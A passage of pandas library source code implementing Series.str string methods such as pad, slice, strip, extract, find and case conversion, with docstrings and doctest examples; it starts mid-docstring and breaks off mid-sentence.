>>> repl = lambda m: m.group(0)[::-1]
>>> pd.Series(['foo 123', 'bar baz', np.nan]).str.replace(r'[a-z]+', repl)
0 oof 123
1 rab zab
2 NaN
dtype: object
Using regex groups (extract second group and swap case):
>>> pat = r"(?P<one>\w+) (?P<two>\w+) (?P<three>\w+)"
>>> repl = lambda m: m.group('two').swapcase()
>>> pd.Series(['One Two Three', 'Foo Bar Baz']).str.replace(pat, repl)
0 tWO
1 bAR
dtype: object
Using a compiled regex with flags
>>> import re
>>> regex_pat = re.compile(r'FUZ', flags=re.IGNORECASE)
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace(regex_pat, 'bar')
0 foo
1 bar
2 NaN
dtype: object
"""
if regex is None:
if isinstance(pat, str) and any(c in pat for c in ".+*|^$?[](){}\\"):
# warn only in cases where regex behavior would differ from literal
msg = (
"The default value of regex will change from True to False "
"in a future version."
)
if len(pat) == 1:
msg += (
" In addition, single character regular expressions will"
"*not* be treated as literal strings when regex=True."
)
warnings.warn(msg, FutureWarning, stacklevel=3)
regex = True
# Check whether repl is valid (GH 13438, GH 15055)
if not (isinstance(repl, str) or callable(repl)):
raise TypeError("repl must be a string or callable")
is_compiled_re = is_re(pat)
if regex:
if is_compiled_re:
if (case is not None) or (flags != 0):
raise ValueError(
"case and flags cannot be set when pat is a compiled regex"
)
elif case is None:
# not a compiled regex, set default case
case = True
elif is_compiled_re:
raise ValueError(
"Cannot use a compiled regex as replacement pattern with regex=False"
)
elif callable(repl):
raise ValueError("Cannot use a callable replacement when regex=False")
result = self._data.array._str_replace(
pat, repl, n=n, case=case, flags=flags, regex=regex
)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def repeat(self, repeats):
"""
Duplicate each string in the Series or Index.
Parameters
----------
repeats : int or sequence of int
Same value for all (int) or different value per (sequence).
Returns
-------
Series or Index of object
Series or Index of repeated string objects specified by
input parameter repeats.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c'])
>>> s
0 a
1 b
2 c
dtype: object
Single int repeats string in Series
>>> s.str.repeat(repeats=2)
0 aa
1 bb
2 cc
dtype: object
Sequence of int repeats corresponding string in Series
>>> s.str.repeat(repeats=[1, 2, 3])
0 a
1 bb
2 ccc
dtype: object
"""
result = self._data.array._str_repeat(repeats)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def pad(self, width, side="left", fillchar=" "):
"""
Pad strings in the Series/Index up to width.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with character defined in `fillchar`.
side : {'left', 'right', 'both'}, default 'left'
Side from which to fill resulting string.
fillchar : str, default ' '
Additional character for filling, default is whitespace.
Returns
-------
Series or Index of object
Returns Series or Index with minimum number of char in object.
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='left')``.
Series.str.ljust : Fills the right side of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='right')``.
Series.str.center : Fills both sides of strings with an arbitrary
character. Equivalent to ``Series.str.pad(side='both')``.
Series.str.zfill : Pad strings in the Series/Index by prepending '0'
character. Equivalent to ``Series.str.pad(side='left', fillchar='0')``.
Examples
--------
>>> s = pd.Series(["caribou", "tiger"])
>>> s
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10)
0 caribou
1 tiger
dtype: object
>>> s.str.pad(width=10, side='right', fillchar='-')
0 caribou---
1 tiger-----
dtype: object
>>> s.str.pad(width=10, side='both', fillchar='-')
0 -caribou--
1 --tiger---
dtype: object
"""
if not isinstance(fillchar, str):
msg = f"fillchar must be a character, not {type(fillchar).__name__}"
raise TypeError(msg)
if len(fillchar) != 1:
raise TypeError("fillchar must be a character, not str")
if not is_integer(width):
msg = f"width must be of integer type, not {type(width).__name__}"
raise TypeError(msg)
result = self._data.array._str_pad(width, side=side, fillchar=fillchar)
return self._wrap_result(result)
_shared_docs[
"str_pad"
] = """
Pad %(side)s side of strings in the Series/Index.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with ``fillchar``.
fillchar : str
Additional character for filling, default is whitespace.
Returns
-------
filled : Series/Index of objects.
"""
@Appender(_shared_docs["str_pad"] % {"side": "left and right", "method": "center"})
@forbid_nonstring_types(["bytes"])
def center(self, width, fillchar=" "):
return self.pad(width, side="both", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % {"side": "right", "method": "ljust"})
@forbid_nonstring_types(["bytes"])
def ljust(self, width, fillchar=" "):
return self.pad(width, side="right", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % {"side": "left", "method": "rjust"})
@forbid_nonstring_types(["bytes"])
def rjust(self, width, fillchar=" "):
return self.pad(width, side="left", fillchar=fillchar)
@forbid_nonstring_types(["bytes"])
def zfill(self, width):
"""
Pad strings in the Series/Index by prepending '0' characters.
Strings in the Series/Index are padded with '0' characters on the
left of the string to reach a total string length `width`. Strings
in the Series/Index with length greater or equal to `width` are
unchanged.
Parameters
----------
width : int
Minimum length of resulting string; strings with length less
than `width` be prepended with '0' characters.
Returns
-------
Series/Index of objects.
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character.
Series.str.ljust : Fills the right side of strings with an arbitrary
character.
Series.str.pad : Fills the specified sides of strings with an arbitrary
character.
Series.str.center : Fills both sides of strings with an arbitrary
character.
Notes
-----
Differs from :meth:`str.zfill` which has special handling
for '+'/'-' in the string.
Examples
--------
>>> s = pd.Series(['-1', '1', '1000', 10, np.nan])
>>> s
0 -1
1 1
2 1000
3 10
4 NaN
dtype: object
Note that ``10`` and ``NaN`` are not strings, therefore they are
converted to ``NaN``. The minus sign in ``'-1'`` is treated as a
regular character and the zero is added to the left of it
(:meth:`str.zfill` would have moved it to the left). ``1000``
remains unchanged as it is longer than `width`.
>>> s.str.zfill(3)
0 0-1
1 001
2 1000
3 NaN
4 NaN
dtype: object
"""
result = self.pad(width, side="left", fillchar="0")
return self._wrap_result(result)
def slice(self, start=None, stop=None, step=None):
"""
Slice substrings from each element in the Series or Index.
Parameters
----------
start : int, optional
Start position for slice operation.
stop : int, optional
Stop position for slice operation.
step : int, optional
Step size for slice operation.
Returns
-------
Series or Index of object
Series or Index from sliced substring from original string object.
See Also
--------
Series.str.slice_replace : Replace a slice with a string.
Series.str.get : Return element at position.
Equivalent to `Series.str.slice(start=i, stop=i+1)` with `i`
being the position.
Examples
--------
>>> s = pd.Series(["koala", "dog", "chameleon"])
>>> s
0 koala
1 dog
2 chameleon
dtype: object
>>> s.str.slice(start=1)
0 oala
1 og
2 hameleon
dtype: object
>>> s.str.slice(start=-1)
0 a
1 g
2 n
dtype: object
>>> s.str.slice(stop=2)
0 ko
1 do
2 ch
dtype: object
>>> s.str.slice(step=2)
0 kaa
1 dg
2 caeen
dtype: object
>>> s.str.slice(start=0, stop=5, step=3)
0 kl
1 d
2 cm
dtype: object
Equivalent behaviour to:
>>> s.str[0:5:3]
0 kl
1 d
2 cm
dtype: object
"""
result = self._data.array._str_slice(start, stop, step)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def slice_replace(self, start=None, stop=None, repl=None):
"""
Replace a positional slice of a string with another value.
Parameters
----------
start : int, optional
Left index position to use for the slice. If not specified (None),
the slice is unbounded on the left, i.e. slice from the start
of the string.
stop : int, optional
Right index position to use for the slice. If not specified (None),
the slice is unbounded on the right, i.e. slice until the
end of the string.
repl : str, optional
String for replacement. If not specified (None), the sliced region
is replaced with an empty string.
Returns
-------
Series or Index
Same type as the original object.
See Also
--------
Series.str.slice : Just slicing without replacement.
Examples
--------
>>> s = pd.Series(['a', 'ab', 'abc', 'abdc', 'abcde'])
>>> s
0 a
1 ab
2 abc
3 abdc
4 abcde
dtype: object
Specify just `start`, meaning replace `start` until the end of the
string with `repl`.
>>> s.str.slice_replace(1, repl='X')
0 aX
1 aX
2 aX
3 aX
4 aX
dtype: object
Specify just `stop`, meaning the start of the string to `stop` is replaced
with `repl`, and the rest of the string is included.
>>> s.str.slice_replace(stop=2, repl='X')
0 X
1 X
2 Xc
3 Xdc
4 Xcde
dtype: object
Specify `start` and `stop`, meaning the slice from `start` to `stop` is
replaced with `repl`. Everything before or after `start` and `stop` is
included as is.
>>> s.str.slice_replace(start=1, stop=3, repl='X')
0 aX
1 aX
2 aX
3 aXc
4 aXde
dtype: object
"""
result = self._data.array._str_slice_replace(start, stop, repl)
return self._wrap_result(result)
def decode(self, encoding, errors="strict"):
"""
Decode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.decode` in python2 and :meth:`bytes.decode` in
python3.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
Series or Index
"""
# TODO: Add a similar _bytes interface.
if encoding in _cpython_optimized_decoders:
# CPython optimized implementation
f = lambda x: x.decode(encoding, errors)
else:
decoder = codecs.getdecoder(encoding)
f = lambda x: decoder(x, errors)[0]
arr = self._data.array
# assert isinstance(arr, (StringArray,))
result = arr._str_map(f)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def encode(self, encoding, errors="strict"):
"""
Encode character string in the Series/Index using indicated encoding.
Equivalent to :meth:`str.encode`.
Parameters
----------
encoding : str
errors : str, optional
Returns
-------
encoded : Series/Index of objects
"""
result = self._data.array._str_encode(encoding, errors)
return self._wrap_result(result, returns_string=False)
_shared_docs[
"str_strip"
] = r"""
Remove %(position)s characters.
Strip whitespaces (including newlines) or a set of specified characters
from each string in the Series/Index from %(side)s.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
to_strip : str or None, default None
Specifying the set of characters to be removed.
All combinations of this set of characters will be stripped.
If None then whitespaces are removed.
Returns
-------
Series or Index of object
See Also
--------
Series.str.strip : Remove leading and trailing characters in Series/Index.
Series.str.lstrip : Remove leading characters in Series/Index.
Series.str.rstrip : Remove trailing characters in Series/Index.
Examples
--------
>>> s = pd.Series(['1. Ant. ', '2. Bee!\n', '3. Cat?\t', np.nan])
>>> s
0 1. Ant.
1 2. Bee!\n
2 3. Cat?\t
3 NaN
dtype: object
>>> s.str.strip()
0 1. Ant.
1 2. Bee!
2 3. Cat?
3 NaN
dtype: object
>>> s.str.lstrip('123.')
0 Ant.
1 Bee!\n
2 Cat?\t
3 NaN
dtype: object
>>> s.str.rstrip('.!? \n\t')
0 1. Ant
1 2. Bee
2 3. Cat
3 NaN
dtype: object
>>> s.str.strip('123.!? \n\t')
0 Ant
1 Bee
2 Cat
3 NaN
dtype: object
"""
@Appender(
_shared_docs["str_strip"]
% {
"side": "left and right sides",
"method": "strip",
"position": "leading and trailing",
}
)
@forbid_nonstring_types(["bytes"])
def strip(self, to_strip=None):
result = self._data.array._str_strip(to_strip)
return self._wrap_result(result)
@Appender(
_shared_docs["str_strip"]
% {"side": "left side", "method": "lstrip", "position": "leading"}
)
@forbid_nonstring_types(["bytes"])
def lstrip(self, to_strip=None):
result = self._data.array._str_lstrip(to_strip)
return self._wrap_result(result)
@Appender(
_shared_docs["str_strip"]
% {"side": "right side", "method": "rstrip", "position": "trailing"}
)
@forbid_nonstring_types(["bytes"])
def rstrip(self, to_strip=None):
result = self._data.array._str_rstrip(to_strip)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def wrap(self, width, **kwargs):
r"""
Wrap strings in Series/Index at specified line width.
This method has the same keyword parameters and defaults as
:class:`textwrap.TextWrapper`.
Parameters
----------
width : int
Maximum line width.
expand_tabs : bool, optional
If True, tab characters will be expanded to spaces (default: True).
replace_whitespace : bool, optional
If True, each whitespace character (as defined by string.whitespace)
remaining after tab expansion will be replaced by a single space
(default: True).
drop_whitespace : bool, optional
If True, whitespace that, after wrapping, happens to end up at the
beginning or end of a line is dropped (default: True).
break_long_words : bool, optional
If True, then words longer than width will be broken in order to ensure
that no lines are longer than width. If it is false, long words will
not be broken, and some lines may be longer than width (default: True).
break_on_hyphens : bool, optional
If True, wrapping will occur preferably on whitespace and right after
hyphens in compound words, as it is customary in English. If false,
only whitespaces will be considered as potentially good places for line
breaks, but you need to set break_long_words to false if you want truly
insecable words (default: True).
Returns
-------
Series or Index
Notes
-----
Internally, this method uses a :class:`textwrap.TextWrapper` instance with
default settings. To achieve behavior matching R's stringr library str_wrap
function, use the arguments:
- expand_tabs = False
- replace_whitespace = True
- drop_whitespace = True
- break_long_words = False
- break_on_hyphens = False
Examples
--------
>>> s = pd.Series(['line to be wrapped', 'another line to be wrapped'])
>>> s.str.wrap(12)
0 line to be\nwrapped
1 another line\nto be\nwrapped
dtype: object
"""
result = self._data.array._str_wrap(width, **kwargs)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def get_dummies(self, sep="|"):
"""
Return DataFrame of dummy/indicator variables for Series.
Each string in Series is split by sep and returned as a DataFrame
of dummy/indicator variables.
Parameters
----------
sep : str, default "|"
String to split on.
Returns
-------
DataFrame
Dummy variables corresponding to values of the Series.
See Also
--------
get_dummies : Convert categorical variable into dummy/indicator
variables.
Examples
--------
>>> pd.Series(['a|b', 'a', 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 1 0 0
2 1 0 1
>>> pd.Series(['a|b', np.nan, 'a|c']).str.get_dummies()
a b c
0 1 1 0
1 0 0 0
2 1 0 1
"""
# we need to cast to Series of strings as only that has all
# methods available for making the dummies...
result, name = self._data.array._str_get_dummies(sep)
return self._wrap_result(
result,
name=name,
expand=True,
returns_string=False,
)
@forbid_nonstring_types(["bytes"])
def translate(self, table):
"""
Map all characters in the string through the given mapping table.
Equivalent to standard :meth:`str.translate`.
Parameters
----------
table : dict
Table is a mapping of Unicode ordinals to Unicode ordinals, strings, or
None. Unmapped characters are left untouched.
Characters mapped to None are deleted. :meth:`str.maketrans` is a
helper function for making translation tables.
Returns
-------
Series or Index
"""
result = self._data.array._str_translate(table)
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def count(self, pat, flags=0):
r"""
Count occurrences of pattern in each string of the Series/Index.
This function is used to count the number of times a particular regex
pattern is repeated in each of the string elements of the
:class:`~pandas.Series`.
Parameters
----------
pat : str
Valid regular expression.
flags : int, default 0, meaning no flags
Flags for the `re` module. For a complete list, `see here
<https://docs.python.org/3/howto/regex.html#compilation-flags>`_.
**kwargs
For compatibility with other string methods. Not used.
Returns
-------
Series or Index
Same type as the calling object containing the integer counts.
See Also
--------
re : Standard library module for regular expressions.
str.count : Standard library version, without regular expression support.
Notes
-----
Some characters need to be escaped when passing in `pat`.
eg. ``'$'`` has a special meaning in regex and must be escaped when
finding this literal character.
Examples
--------
>>> s = pd.Series(['A', 'B', 'Aaba', 'Baca', np.nan, 'CABA', 'cat'])
>>> s.str.count('a')
0 0.0
1 0.0
2 2.0
3 2.0
4 NaN
5 0.0
6 1.0
dtype: float64
Escape ``'$'`` to find the literal dollar sign.
>>> s = pd.Series(['$', 'B', 'Aab$', '$$ca', 'C$B$', 'cat'])
>>> s.str.count('\\$')
0 1
1 0
2 1
3 2
4 2
5 0
dtype: int64
This is also available on Index
>>> pd.Index(['A', 'A', 'Aaba', 'cat']).str.count('a')
Int64Index([0, 0, 2, 1], dtype='int64')
"""
result = self._data.array._str_count(pat, flags)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def startswith(self, pat, na=None):
"""
Test if the start of each string element matches a pattern.
Equivalent to :meth:`str.startswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string. The default depends
on dtype of the array. For object-dtype, ``numpy.nan`` is used.
For ``StringDtype``, ``pandas.NA`` is used.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the start of each string element.
See Also
--------
str.startswith : Python standard library string method.
Series.str.endswith : Same as startswith, but tests the end of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'Bear', 'cat', np.nan])
>>> s
0 bat
1 Bear
2 cat
3 NaN
dtype: object
>>> s.str.startswith('b')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.startswith('b', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
result = self._data.array._str_startswith(pat, na=na)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def endswith(self, pat, na=None):
"""
Test if the end of each string element matches a pattern.
Equivalent to :meth:`str.endswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string. The default depends
on dtype of the array. For object-dtype, ``numpy.nan`` is used.
For ``StringDtype``, ``pandas.NA`` is used.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the end of each string element.
See Also
--------
str.endswith : Python standard library string method.
Series.str.startswith : Same as endswith, but tests the start of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'bear', 'caT', np.nan])
>>> s
0 bat
1 bear
2 caT
3 NaN
dtype: object
>>> s.str.endswith('t')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.endswith('t', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
result = self._data.array._str_endswith(pat, na=na)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def findall(self, pat, flags=0):
"""
Find all occurrences of pattern or regular expression in the Series/Index.
Equivalent to applying :func:`re.findall` to all the elements in the
Series/Index.
Parameters
----------
pat : str
Pattern or regular expression.
flags : int, default 0
Flags from ``re`` module, e.g. `re.IGNORECASE` (default is 0, which
means no flags).
Returns
-------
Series/Index of lists of strings
All non-overlapping matches of pattern or regular expression in each
string of this Series/Index.
See Also
--------
count : Count occurrences of pattern or regular expression in each string
of the Series/Index.
extractall : For each string in the Series, extract groups from all matches
of regular expression and return a DataFrame with one row for each
match and one column for each group.
re.findall : The equivalent ``re`` function to all non-overlapping matches
of pattern or regular expression in string, as a list of strings.
Examples
--------
>>> s = pd.Series(['Lion', 'Monkey', 'Rabbit'])
The search for the pattern 'Monkey' returns one match:
>>> s.str.findall('Monkey')
0 []
1 [Monkey]
2 []
dtype: object
On the other hand, the search for the pattern 'MONKEY' doesn't return any
match:
>>> s.str.findall('MONKEY')
0 []
1 []
2 []
dtype: object
Flags can be added to the pattern or regular expression. For instance,
to find the pattern 'MONKEY' ignoring the case:
>>> import re
>>> s.str.findall('MONKEY', flags=re.IGNORECASE)
0 []
1 [Monkey]
2 []
dtype: object
When the pattern matches more than one string in the Series, all matches
are returned:
>>> s.str.findall('on')
0 [on]
1 [on]
2 []
dtype: object
Regular expressions are supported too. For instance, the search for all the
strings ending with the word 'on' is shown next:
>>> s.str.findall('on$')
0 [on]
1 []
2 []
dtype: object
If the pattern is found more than once in the same string, then a list of
multiple strings is returned:
>>> s.str.findall('b')
0 []
1 []
2 [b, b]
dtype: object
"""
result = self._data.array._str_findall(pat, flags)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def extract(self, pat, flags=0, expand=True):
r"""
Extract capture groups in the regex `pat` as columns in a DataFrame.
For each subject string in the Series, extract groups from the
first match of regular expression `pat`.
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
Flags from the ``re`` module, e.g. ``re.IGNORECASE``, that
modify regular expression matching for things like case,
spaces, etc. For more details, see :mod:`re`.
expand : bool, default True
If True, return DataFrame with one column per capture group.
If False, return a Series/Index if there is one capture group
or DataFrame if there are multiple capture groups.
Returns
-------
DataFrame or Series or Index
A DataFrame with one row for each subject string, and one
column for each group. Any capture group names in regular
expression pat will be used for column names; otherwise
capture group numbers will be used. The dtype of each result
column is always object, even when no match is found. If
``expand=False`` and pat has only one capture group, then
return a Series (if subject is a Series) or Index (if subject
is an Index).
See Also
--------
extractall : Returns all matches (not just the first match).
Examples
--------
A pattern with two groups will return a DataFrame with two columns.
Non-matches will be NaN.
>>> s = pd.Series(['a1', 'b2', 'c3'])
>>> s.str.extract(r'([ab])(\d)')
0 1
0 a 1
1 b 2
2 NaN NaN
A pattern may contain optional groups.
>>> s.str.extract(r'([ab])?(\d)')
0 1
0 a 1
1 b 2
2 NaN 3
Named groups will become column names in the result.
>>> s.str.extract(r'(?P<letter>[ab])(?P<digit>\d)')
letter digit
0 a 1
1 b 2
2 NaN NaN
A pattern with one group will return a DataFrame with one column
if expand=True.
>>> s.str.extract(r'[ab](\d)', expand=True)
0
0 1
1 2
2 NaN
A pattern with one group will return a Series if expand=False.
>>> s.str.extract(r'[ab](\d)', expand=False)
0 1
1 2
2 NaN
dtype: object
"""
# TODO: dispatch
return str_extract(self, pat, flags, expand=expand)
@forbid_nonstring_types(["bytes"])
def extractall(self, pat, flags=0):
r"""
Extract capture groups in the regex `pat` as columns in DataFrame.
For each subject string in the Series, extract groups from all
matches of regular expression pat. When each subject string in the
Series has exactly one match, extractall(pat).xs(0, level='match')
is the same as extract(pat).
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
A ``re`` module flag, for example ``re.IGNORECASE``. These allow
to modify regular expression matching for things like case, spaces,
etc. Multiple flags can be combined with the bitwise OR operator,
for example ``re.IGNORECASE | re.MULTILINE``.
Returns
-------
DataFrame
A ``DataFrame`` with one row for each match, and one column for each
group. Its rows have a ``MultiIndex`` with first levels that come from
the subject ``Series``. The last level is named 'match' and indexes the
matches in each item of the ``Series``. Any capture group names in
regular expression pat will be used for column names; otherwise capture
group numbers will be used.
See Also
--------
extract : Returns first match only (not all matches).
Examples
--------
A pattern with one group will return a DataFrame with one column.
Indices with no matches will not appear in the result.
>>> s = pd.Series(["a1a2", "b1", "c1"], index=["A", "B", "C"])
>>> s.str.extractall(r"[ab](\d)")
0
match
A 0 1
1 2
B 0 1
Capture group names are used for column names of the result.
>>> s.str.extractall(r"[ab](?P<digit>\d)")
digit
match
A 0 1
1 2
B 0 1
A pattern with two groups will return a DataFrame with two columns.
>>> s.str.extractall(r"(?P<letter>[ab])(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
Optional groups that do not match are NaN in the result.
>>> s.str.extractall(r"(?P<letter>[ab])?(?P<digit>\d)")
letter digit
match
A 0 a 1
1 a 2
B 0 b 1
C 0 NaN 1
"""
# TODO: dispatch
return str_extractall(self._orig, pat, flags)
_shared_docs[
"find"
] = """
Return %(side)s indexes in each strings in the Series/Index.
Each of returned indexes corresponds to the position where the
substring is fully contained between [start:end]. Return -1 on
failure. Equivalent to standard :meth:`str.%(method)s`.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
Returns
-------
Series or Index of int.
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["find"]
% {
"side": "lowest",
"method": "find",
"also": "rfind : Return highest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def find(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_find(sub, start, end)
return self._wrap_result(result, returns_string=False)
@Appender(
_shared_docs["find"]
% {
"side": "highest",
"method": "rfind",
"also": "find : Return lowest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def rfind(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_rfind(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
@forbid_nonstring_types(["bytes"])
def normalize(self, form):
"""
Return the Unicode normal form for the strings in the Series/Index.
For more information on the forms, see the
:func:`unicodedata.normalize`.
Parameters
----------
form : {'NFC', 'NFKC', 'NFD', 'NFKD'}
Unicode form.
Returns
-------
normalized : Series/Index of objects
"""
result = self._data.array._str_normalize(form)
return self._wrap_result(result)
_shared_docs[
"index"
] = """
Return %(side)s indexes in each string in Series/Index.
Each of the returned indexes corresponds to the position where the
substring is fully contained between [start:end]. This is the same
as ``str.%(similar)s`` except instead of returning -1, it raises a
ValueError when the substring is not found. Equivalent to standard
``str.%(method)s``.
Parameters
----------
sub : str
Substring being searched.
start : int
Left edge index.
end : int
Right edge index.
Returns
-------
Series or Index of object
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["index"]
% {
"side": "lowest",
"similar": "find",
"method": "index",
"also": "rindex : Return highest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def index(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_index(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
@Appender(
_shared_docs["index"]
% {
"side": "highest",
"similar": "rfind",
"method": "rindex",
"also": "index : Return lowest indexes in each strings.",
}
)
@forbid_nonstring_types(["bytes"])
def rindex(self, sub, start=0, end=None):
if not isinstance(sub, str):
msg = f"expected a string object, not {type(sub).__name__}"
raise TypeError(msg)
result = self._data.array._str_rindex(sub, start=start, end=end)
return self._wrap_result(result, returns_string=False)
def len(self):
"""
Compute the length of each element in the Series/Index.
The element may be a sequence (such as a string, tuple or list) or a collection
(such as a dictionary).
Returns
-------
Series or Index of int
A Series or Index of integer values indicating the length of each
element in the Series or Index.
See Also
--------
str.len : Python built-in function returning the length of an object.
Series.size : Returns the length of the Series.
Examples
--------
Returns the length (number of characters) in a string. Returns the
number of entries for dictionaries, lists or tuples.
>>> s = pd.Series(['dog',
... '',
... 5,
... {'foo' : 'bar'},
... [2, 3, 5, 7],
... ('one', 'two', 'three')])
>>> s
0 dog
1
2 5
3 {'foo': 'bar'}
4 [2, 3, 5, 7]
5 (one, two, three)
dtype: object
>>> s.str.len()
0 3.0
1 0.0
2 NaN
3 1.0
4 4.0
5 3.0
dtype: float64
"""
result = self._data.array._str_len()
return self._wrap_result(result, returns_string=False)
_shared_docs[
"casemethods"
] = """
Convert strings in the Series/Index to %(type)s.
%(version)s
Equivalent to :meth:`str.%(method)s`.
Returns
-------
Series or Index of object
See Also
--------
Series.str.lower : Converts all characters to lowercase.
Series.str.upper : Converts all characters to uppercase.
Series.str.title : Converts first character of each word to uppercase and
remaining to lowercase.
Series.str.capitalize : Converts first character to uppercase and
remaining to lowercase.
Series.str.swapcase : Converts uppercase to lowercase and lowercase to
uppercase.
Series.str.casefold: Removes all case distinctions in the string.
Examples
--------
>>> s = pd.Series(['lower', 'CAPITALS', 'this is a sentence', 'SwApCaSe'])
>>> s
0 lower
1 CAPITALS
2 this is a sentence
3 SwApCaSe
dtype: object
>>> s.str.lower()
0 lower
1 capitals
2 this is a sentence
3 swapcase
dtype: object
>>> s.str.upper()
0 LOWER
1 CAPITALS
2 THIS IS A SENTENCE
3 SWAPCASE
dtype: object
>>> s.str.title()
0 Lower
1 Capitals
2 This Is A Sentence
3 Swapcase
dtype: object
>>> s.str.capitalize()
0 Lower
1 Capitals
2 This is a sentence
3 Swapcase
dtype: object
>>> s.str.swapcase()
0 LOWER
1 capitals
2 THIS IS A SENTENCE
3 sWaPcAsE
dtype: object
"""
# Types:
# cases:
# upper, lower, title, capitalize, swapcase, casefold
# boolean:
# isalpha, isnumeric isalnum isdigit isdecimal isspace islower isupper istitle
# _doc_args holds dict of strings to use in substituting casemethod docs
_doc_args: Dict[str, Dict[str, str]] = {}
_doc_args["lower"] = {"type": "lowercase", "method": "lower", "version": ""}
_doc_args["upper"] = {"type": "uppercase", "method": "upper", "version": ""}
_doc_args["title"] = {"type": "titlecase", "method": "title", "version": ""}
_doc_args["capitalize"] = {
"type": "be capitalized",
"method": "capitalize",
"version": "",
}
_doc_args["swapcase"] = {
"type": "be swapcased",
"method": "swapcase",
"version": "",
}
_doc_args["casefold"] = {
"type": "be casefolded",
"method": "casefold",
"version": "\n .. versionadded:: 0.25.0\n",
}
@Appender(_shared_docs["casemethods"] % _doc_args["lower"])
@forbid_nonstring_types(["bytes"])
def lower(self):
result = self._data.array._str_lower()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["upper"])
@forbid_nonstring_types(["bytes"])
def upper(self):
result = self._data.array._str_upper()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["title"])
@forbid_nonstring_types(["bytes"])
def title(self):
result = self._data.array._str_title()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["capitalize"])
@forbid_nonstring_types(["bytes"])
def capitalize(self):
result = self._data.array._str_capitalize()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["swapcase"])
@forbid_nonstring_types(["bytes"])
def swapcase(self):
result = self._data.array._str_swapcase()
return self._wrap_result(result)
@Appender(_shared_docs["casemethods"] % _doc_args["casefold"])
@forbid_nonstring_types(["bytes"])
def casefold(self):
result = self._data.array._str_casefold()
return self._wrap_result(result)
_shared_docs[
"ismethods"
] = """
Check whether all characters in each string are %(type)s.
This is equivalent to running the Python string method
:meth:`str.%(method)s` for each element of the Series/Index. If a string
has zero characters, ``False`` is returned for that check.
Returns
-------
Series or Index of bool
Series or Index of boolean values with the same length as the original
Series/Index.
See Also
--------
Series.str.isalpha : Check whether all characters are alphabetic.
Series.str.isnumeric : Check whether all characters are numeric.
Series.str.isalnum : Check whether all characters are alphanumeric.
Series.str.isdigit : Check whether all characters are digits.
Series.str.isdecimal : Check whether all characters are decimal.
Series.str.isspace : Check whether all characters are whitespace.
Series.str.islower : Check whether all characters are lowercase.
Series.str.isupper : Check whether all characters are uppercase.
Series.str.istitle : Check whether all characters are titlecase.
Examples
--------
**Checks for Alphabetic and Numeric Characters**
>>> s1 = pd.Series(['one', 'one1', '1', ''])
>>> s1.str.isalpha()
0 True
1 False
2 False
3 False
dtype: bool
>>> s1.str.isnumeric()
0 False
1 False
2 True
3 False
dtype: bool
>>> s1.str.isalnum()
0 True
1 True
2 True
3 False
dtype: bool
Note that checks against characters mixed with any additional punctuation
